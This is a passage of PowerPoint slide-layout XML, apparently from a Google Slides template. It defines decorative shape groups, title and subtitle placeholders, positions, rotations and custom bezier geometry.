            <a:off x="5954700" y="0"/>
            <a:ext cx="3189300" cy="1619850"/>
            <a:chOff x="4185675" y="845125"/>
            <a:chExt cx="3189300" cy="1619850"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1241" name="Google Shape;1241;p11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4" name="Google Shape;124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8" name="Google Shape;1248;p13"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm flipH="1" rot="-5400000">
            <a:off x="-794250" y="2742600"/>
            <a:ext cx="3189300" cy="1619850"/>
            <a:chOff x="4185675" y="845125"/>
            <a:chExt cx="3189300" cy="1619850"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1249" name="Google Shape;1249;p13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3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3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13"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1923800" y="1654019"/>
            <a:ext cx="2480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3" name="Google Shape;1253;p13"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="2" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1923800" y="200069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4" name="Google Shape;1254;p13"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph hasCustomPrompt="1" type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1923800" y="12602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5" name="Google Shape;1255;p13"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="3" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1923800" y="3276219"/>
            <a:ext cx="2480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6" name="Google Shape;1256;p13"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="4" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1923800" y="362289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7" name="Google Shape;1257;p13"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph hasCustomPrompt="1" idx="5" type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1923800" y="28824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8" name="Google Shape;1258;p13"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="6" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4740100" y="1654019"/>
            <a:ext cx="2480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9" name="Google Shape;1259;p13"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="7" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4740100" y="200069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0" name="Google Shape;1260;p13"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph hasCustomPrompt="1" idx="8" type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4821226" y="12602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1" name="Google Shape;1261;p13"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="9" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4740100" y="3276219"/>
            <a:ext cx="2480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2" name="Google Shape;1262;p13"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="13" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4740100" y="3622894"/>
            <a:ext cx="2480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3" name="Google Shape;1263;p13"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph hasCustomPrompt="1" idx="14" type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4821226" y="28824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4" name="Google Shape;1264;p13"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="15"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65" name="Google Shape;1265;p13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266" name="Google Shape;1266;p13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3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3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3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3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1" name="Google Shape;1271;p13"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm rot="-5400000">
            <a:off x="-1007424" y="2861265"/>
            <a:ext cx="3277907" cy="1263055"/>
            <a:chOff x="1766764" y="-4125385"/>
            <a:chExt cx="3277907" cy="1263055"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1272" name="Google Shape;1272;p13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3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3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3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3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3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3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3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3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3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3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3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3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3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3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3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3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" name="Google Shape;1298;p13"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm rot="5400000">
            <a:off x="6873526" y="1007428"/>
            <a:ext cx="3277907" cy="1263055"/>
            <a:chOff x="1766764" y="-4125385"/>
            <a:chExt cx="3277907" cy="1263055"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1299" name="Google Shape;1299;p13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3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5" name="Google Shape;1325;p13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326" name="Google Shape;1326;p13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2" name="Google Shape;13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14"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3689250" y="28703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355" name="Google Shape;1355;p14"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="2" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3480300" y="3218169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14"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="3" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6266775" y="28703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357" name="Google Shape;1357;p14"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="4" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6057825" y="3218169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14"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="5" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1111725" y="2870375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359" name="Google Shape;1359;p14"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="6" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="902775" y="3218169"/>
            <a:ext cx="21834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0" name="Google Shape;1360;p14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361" name="Google Shape;1361;p1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362" name="Google Shape;1362;p14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4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4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6" name="Google Shape;1416;p14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417" name="Google Shape;1417;p14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2" name="Google Shape;1422;p14"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm flipH="1" rot="-5400000">
            <a:off x="-784725" y="2727175"/>
            <a:ext cx="3189300" cy="1619850"/>
            <a:chOff x="4185675" y="845125"/>
            <a:chExt cx="3189300" cy="1619850"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1423" name="Google Shape;1423;p14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4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4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6" name="Google Shape;1426;p14"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="5866101" y="3895490"/>
            <a:ext cx="3277907" cy="1263055"/>
            <a:chOff x="1766764" y="-4125385"/>
            <a:chExt cx="3277907" cy="1263055"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1427" name="Google Shape;1427;p1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3" name="Google Shape;145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3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5"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2024550" y="1330650"/>
            <a:ext cx="5094900" cy="27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456" name="Google Shape;1456;p15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5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6524623" y="0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5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9" name="Google Shape;1459;p15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0" name="Google Shape;1460;p15"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="7855910" y="4"/>
            <a:ext cx="1280726" cy="3383675"/>
            <a:chOff x="9196698" y="950579"/>
            <a:chExt cx="1280726" cy="3383675"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1461" name="Google Shape;1461;p15"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm flipH="1" rot="10800000">
              <a:off x="9419903" y="2786190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 flipH="1" rot="10800000">
              <a:off x="9599228" y="215766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5"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm flipH="1" rot="10800000">
              <a:off x="9546302" y="3614502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5"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm flipH="1" rot="10800000">
              <a:off x="9828268" y="3796617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 flipH="1" rot="10800000">
              <a:off x="10207125" y="3808369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 flipH="1" rot="10800000">
              <a:off x="9549176" y="3999362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5"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm flipH="1" rot="10800000">
              <a:off x="9196698" y="314450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5"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm flipH="1" rot="10800000">
              <a:off x="9707787" y="1811104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5"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm flipH="1" rot="10800000">
              <a:off x="9613771" y="3653647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5"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm flipH="1" rot="10800000">
              <a:off x="9387775" y="3309201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5"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm flipH="1" rot="10800000">
              <a:off x="9540468" y="1825815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 flipH="1" rot="10800000">
              <a:off x="9725373" y="1297224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 flipH="1" rot="10800000">
              <a:off x="9834186" y="95057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 flipH="1" rot="10800000">
              <a:off x="9666613" y="965375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 flipH="1" rot="10800000">
              <a:off x="10177702" y="1025488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 flipH="1" rot="10800000">
              <a:off x="9490416" y="2925778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 flipH="1" rot="10800000">
              <a:off x="9352519" y="3023684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 flipH="1" rot="10800000">
              <a:off x="10177702" y="4093379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 flipH="1" rot="10800000">
              <a:off x="10421622" y="4278284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 flipH="1" rot="10800000">
              <a:off x="10177702" y="4003758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1" name="Google Shape;1481;p15"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm rot="-5400000">
            <a:off x="6321128" y="2391309"/>
            <a:ext cx="1715384" cy="3918269"/>
            <a:chOff x="10706378" y="539509"/>
            <a:chExt cx="1715384" cy="3918269"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1482" name="Google Shape;1482;p15"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm flipH="1" rot="10800000">
              <a:off x="10962050" y="4005280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5"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm flipH="1" rot="10800000">
              <a:off x="12057532" y="2466178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 flipH="1" rot="10800000">
              <a:off x="12242691" y="3905345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5"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm flipH="1" rot="10800000">
              <a:off x="12313119" y="3942123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5"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm flipH="1" rot="10800000">
              <a:off x="11188130" y="539509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 flipH="1" rot="10800000">
              <a:off x="12028109" y="2213550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 flipH="1" rot="10800000">
              <a:off x="11998771" y="104738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 flipH="1" rot="10800000">
              <a:off x="10706378" y="89773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 flipH="1" rot="10800000">
              <a:off x="12377798" y="1239985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 flipH="1" rot="10800000">
              <a:off x="11390875" y="387017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 flipH="1" rot="10800000">
              <a:off x="11928258" y="4263742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 flipH="1" rot="10800000">
              <a:off x="11658045" y="384666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 flipH="1" rot="10800000">
              <a:off x="11393665" y="4251990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 flipH="1" rot="10800000">
              <a:off x="11655255" y="3757049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 flipH="1" rot="10800000">
              <a:off x="10809357" y="4417957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 flipH="1" rot="10800000">
              <a:off x="11919550" y="227535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 flipH="1" rot="10800000">
              <a:off x="12004605" y="2130778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9" name="Google Shape;1499;p15"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm rot="-5400000">
            <a:off x="5632457" y="-1028869"/>
            <a:ext cx="737423" cy="2819744"/>
            <a:chOff x="12445182" y="1003506"/>
            <a:chExt cx="737423" cy="2819744"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1500" name="Google Shape;1500;p15"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm flipH="1" rot="10800000">
              <a:off x="12486357" y="2971349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 flipH="1" rot="10800000">
              <a:off x="12539199" y="3209181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 flipH="1" rot="10800000">
              <a:off x="12953481" y="2695301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 flipH="1" rot="10800000">
              <a:off x="13106174" y="2316275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 flipH="1" rot="10800000">
              <a:off x="12882969" y="2054939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 flipH="1" rot="10800000">
              <a:off x="13147264" y="194333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 flipH="1" rot="10800000">
              <a:off x="13097212" y="3250271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 flipH="1" rot="10800000">
              <a:off x="12524657" y="360579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 flipH="1" rot="10800000">
              <a:off x="12791742" y="358228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 flipH="1" rot="10800000">
              <a:off x="13035662" y="376719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 flipH="1" rot="10800000">
              <a:off x="12715396" y="3281215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 flipH="1" rot="10800000">
              <a:off x="12665597" y="3228373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 flipH="1" rot="10800000">
              <a:off x="12445182" y="1003506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 flipH="1" rot="10800000">
              <a:off x="12518738" y="114089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 flipH="1" rot="10800000">
              <a:off x="12788952" y="3492753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 flipH="1" rot="10800000">
              <a:off x="13023910" y="2818064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 flipH="1" rot="10800000">
              <a:off x="13000405" y="2388309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7" name="Google Shape;1517;p15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518" name="Google Shape;1518;p15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5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5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5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5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5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5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5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5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5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5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5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5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5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5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5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5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5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5"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="5954700" y="0"/>
            <a:ext cx="3189300" cy="1619850"/>
            <a:chOff x="4185675" y="845125"/>
            <a:chExt cx="3189300" cy="1619850"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1574" name="Google Shape;1574;p15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5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5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7" name="Google Shape;157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9" name="Google Shape;1579;p16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580" name="Google Shape;1580;p16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6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6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6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6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6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6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6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6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6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6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6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6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6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6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6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6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6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6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6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6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6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6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6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6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6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6" name="Google Shape;1606;p16"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1672838" y="1459822"/>
            <a:ext cx="2437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7" name="Google Shape;1607;p16"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="2" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1679574" y="1811275"/>
            <a:ext cx="2633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8" name="Google Shape;1608;p16"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="3" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1672838" y="2777222"/>
            <a:ext cx="2437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9" name="Google Shape;1609;p16"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="4" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1679500" y="3128675"/>
            <a:ext cx="2633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0" name="Google Shape;1610;p16"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="5" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5644438" y="1459822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1" name="Google Shape;1611;p16"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="6" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5644438" y="1811272"/>
            <a:ext cx="26334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2" name="Google Shape;1612;p16"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="7" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5644438" y="2777222"/>
            <a:ext cx="23946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3" name="Google Shape;1613;p16"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="8" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5644438" y="3128672"/>
            <a:ext cx="2633400" cy="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14" name="Google Shape;1614;p16"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm flipH="1" rot="10800000">
            <a:off x="12" y="-12"/>
            <a:ext cx="1653219" cy="1712776"/>
            <a:chOff x="-13316" y="2920278"/>
            <a:chExt cx="2145923" cy="2223230"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="1615" name="Google Shape;1615;p16"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="-13316" y="2920278"/>
              <a:ext cx="2145923" cy="2223230"/>
              <a:chOff x="-13316" y="2920278"/>
              <a:chExt cx="2145923" cy="2223230"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="1616" name="Google Shape;1616;p16"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm rot="5400000">
                <a:off x="-335338" y="3242300"/>
                <a:ext cx="2223230" cy="1579186"/>
              </a:xfrm>
              <a:custGeom>
                <a:rect b="b" l="l" r="r" t="t"/>
                <a:pathLst>
                  <a:path extrusionOk="0" h="14115" w="19872">
                    <a:moveTo>
                      <a:pt x="17580" y="1"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="15754" y="1"/>
                      <a:pt x="14606" y="2651"/>
                      <a:pt x="16189" y="6230"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="16973" y="7970"/>
                      <a:pt x="15814" y="9152"/>
                      <a:pt x="14477" y="9152"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="13625" y="9152"/>
                      <a:pt x="12700" y="8672"/>
                      <a:pt x="12159" y="7550"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="11482" y="6181"/>
                      <a:pt x="10157" y="5415"/>
                      <a:pt x="8843" y="5415"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="7388" y="5415"/>
                      <a:pt x="5948" y="6354"/>
                      <a:pt x="5420" y="8454"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="4619" y="11650"/>
                      <a:pt x="2571" y="14115"/>
                      <a:pt x="0" y="14115"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="19871" y="14115"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="19593" y="983"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="18898" y="306"/>
                      <a:pt x="18200" y="1"/>
                      <a:pt x="17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16"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm flipH="1">
                <a:off x="0" y="4239925"/>
                <a:ext cx="2132607" cy="903576"/>
              </a:xfrm>
              <a:custGeom>
                <a:rect b="b" l="l" r="r" t="t"/>
                <a:pathLst>
                  <a:path extrusionOk="0" h="6430" w="15176">
                    <a:moveTo>
                      <a:pt x="14851" y="1"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="13065" y="1"/>
                      <a:pt x="13747" y="3704"/>
                      <a:pt x="11309" y="3704"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="10789" y="3704"/>
                      <a:pt x="10127" y="3536"/>
                      <a:pt x="9270" y="3128"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="8066" y="2566"/>
                      <a:pt x="6609" y="2262"/>
                      <a:pt x="5236" y="2262"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="2446" y="2262"/>
                      <a:pt x="1" y="3518"/>
                      <a:pt x="724" y="6429"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="15175" y="6429"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="15175" y="37"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="15059" y="13"/>
                      <a:pt x="14951" y="1"/>
                      <a:pt x="148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18" name="Google Shape;1618;p16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6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620" name="Google Shape;1620;p16"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm flipH="1">
            <a:off x="5303899" y="2549283"/>
            <a:ext cx="3840097" cy="2558635"/>
            <a:chOff x="235225" y="2771600"/>
            <a:chExt cx="3133750" cy="2088000"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1621" name="Google Shape;1621;p16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6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6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6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6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6" name="Google Shape;1626;p16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1627" name="Google Shape;1627;p16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3" name="Google Shape;165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5" name="Google Shape;1655;p17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656" name="Google Shape;1656;p17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7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7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7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7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7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7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7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7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7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7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7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7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7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7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7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7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7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7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7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7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7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7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7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7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2" name="Google Shape;1682;p17"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3689242" y="1333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83" name="Google Shape;1683;p17"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="2" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3331942" y="1684475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4" name="Google Shape;1684;p17"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="3" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6307983" y="1333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85" name="Google Shape;1685;p17"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="4" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5950683" y="1684475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6" name="Google Shape;1686;p17"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="5" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1070525" y="1333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87" name="Google Shape;1687;p17"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="6" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="713225" y="1684550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8" name="Google Shape;1688;p17"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="7" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3689242" y="2931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89" name="Google Shape;1689;p17"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="8" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3331942" y="3281838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0" name="Google Shape;1690;p17"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="9" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6307983" y="2931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91" name="Google Shape;1691;p17"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="13" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5950683" y="3281838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2" name="Google Shape;1692;p17"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="14" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1070525" y="2931319"/>
            <a:ext cx="17655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693" name="Google Shape;1693;p17"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="15" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="713225" y="3281838"/>
            <a:ext cx="2480100" cy="5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94" name="Google Shape;1694;p17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695" name="Google Shape;1695;p1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0" name="Google Shape;1700;p17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1701" name="Google Shape;1701;p1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6" name="Google Shape;1706;p17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07" name="Google Shape;1707;p17"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="5858251" y="-10"/>
            <a:ext cx="3277907" cy="1263055"/>
            <a:chOff x="1766764" y="-4125385"/>
            <a:chExt cx="3277907" cy="1263055"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1708" name="Google Shape;1708;p17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7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7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7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7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7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7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7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7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7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7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7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7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7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7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7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7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7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4" name="Google Shape;173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6" name="Google Shape;1736;p18"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="-13316" y="-76200"/>
            <a:ext cx="9164698" cy="5208136"/>
            <a:chOff x="-13316" y="0"/>
            <a:chExt cx="9164698" cy="5208136"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1737" name="Google Shape;1737;p18"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm rot="-5400000">
              <a:off x="7250175" y="38665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8"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm rot="10800000">
              <a:off x="-13306" y="64636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8"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm rot="10800000">
              <a:off x="-13316" y="64644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8"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm flipH="1" rot="10800000">
              <a:off x="7005459" y="6463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8"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm rot="10800000">
              <a:off x="-5928" y="4190754"/>
              <a:ext cx="2619371" cy="1017382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8"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7099721" y="3732512"/>
              <a:ext cx="2038372" cy="1475619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3" name="Google Shape;1743;p18"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm rot="10800000">
              <a:off x="1431" y="1824456"/>
              <a:ext cx="1280726" cy="3383675"/>
              <a:chOff x="9196698" y="950579"/>
              <a:chExt cx="1280726" cy="3383675"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="1744" name="Google Shape;1744;p18"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm flipH="1" rot="10800000">
                <a:off x="9419903" y="2786190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18"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm flipH="1" rot="10800000">
                <a:off x="9599228" y="2157664"/>
                <a:ext cx="26379" cy="26632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18"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm flipH="1" rot="10800000">
                <a:off x="9546302" y="3614502"/>
                <a:ext cx="44049" cy="47093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18"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm flipH="1" rot="10800000">
                <a:off x="9828268" y="3796617"/>
                <a:ext cx="38215" cy="35341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18"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
